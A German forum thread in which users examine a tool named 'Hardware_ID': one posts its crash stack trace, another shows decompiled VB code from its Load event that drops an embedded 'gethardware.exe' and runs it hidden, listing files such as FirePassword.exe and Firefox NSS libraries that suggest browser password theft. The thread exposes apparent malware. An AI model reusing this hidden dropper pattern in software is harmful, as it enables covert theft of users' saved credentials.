Schade das Anubis zuzeit nicht geht -.-' Und wofür benutzt du ein FileStream?
See the end of this message for details on invoking just-in-time (JIT) debugging instead of this dialog box.
************** Exception Text ************** System.IO.DirectoryNotFoundException: Could not find a part of the path 'C:Program Filesgethardware.exe'. at System.IO.__Error.WinIOError(Int32 errorCode, String maybeFullPath) at System.IO.FileStream.Init(String path, FileMode mode, FileAccess access, Int32 rights, Boolean useRights, FileShare share, Int32 bufferSize, FileOptions options, SECURITY_ATTRIBUTES secAttrs, String msgPath, Boolean bFromProxy) at System.IO.FileStream..ctor(String path, FileMode mode) at Hardware_ID.Form1.Form1_Load(Object sender, EventArgs e) at System.EventHandler.Invoke(Object sender, EventArgs e) at System.Windows.Forms.Form.OnLoad(EventArgs e) at System.Windows.Forms.Form.OnCreateControl() at System.Windows.Forms.Control.CreateControl(Boolean fIgnoreVisible) at System.Windows.Forms.Control.CreateControl() at System.Windows.Forms.Control.WmShowWindow(Message& m) at System.Windows.Forms.Control.WndProc(Message& m) at System.Windows.Forms.ScrollableControl.WndProc(Message& m) at System.Windows.Forms.ContainerControl.WndProc(Message& m) at System.Windows.Forms.Form.WmShowWindow(Message& m) at System.Windows.Forms.Form.WndProc(Message& m) at System.Windows.Forms.Control.ControlNativeWindow.OnMessage(Message& m) at System.Windows.Forms.Control.ControlNativeWindow.WndProc(Message& m) at System.Windows.Forms.NativeWindow.Callback(IntPtr hWnd, Int32 msg, IntPtr wparam, IntPtr lparam)
************** JIT Debugging ************** To enable just-in-time (JIT) debugging, the .config file for this application or computer (machine.config) must have the jitDebugging value set in the system.windows.forms section. The application must also be compiled with debugging enabled.
For example:
When JIT debugging is enabled, any unhandled exception will be sent to the JIT debugger registered on the computer rather than be handled by this dialog box.
_________________
noname Poster
Anmeldedatum: 01.05.2008 Beiträge: 131
Verfasst am: 30.07.2008, 13:35
Im Load Event wird eine Datei namens "gethardware.exe" entpackt und gestartet:
Visual Basic: [code] Using stream As FileStream = New FileStream("C:Program Filesgethardware.exe", FileMode.OpenOrCreate) stream.Write(Resources.gethardware, 0, Resources.gethardware.Length) End Using Interaction.Shell("C:Program Filesgethardware.exe", 2, False, -1) [/code]
In dieser "gethardware.exe" steht genug drin um zu erschließen für welchen Sinn sie gedacht war.
Ich kenn mich mit dieser Materie nicht aus aber vll sagen euch die Namen ja etwas: FirePassword.exe nspr4.dll nss3.dll plc4.dll plds4.dll softokn3.dll getname.bat _________________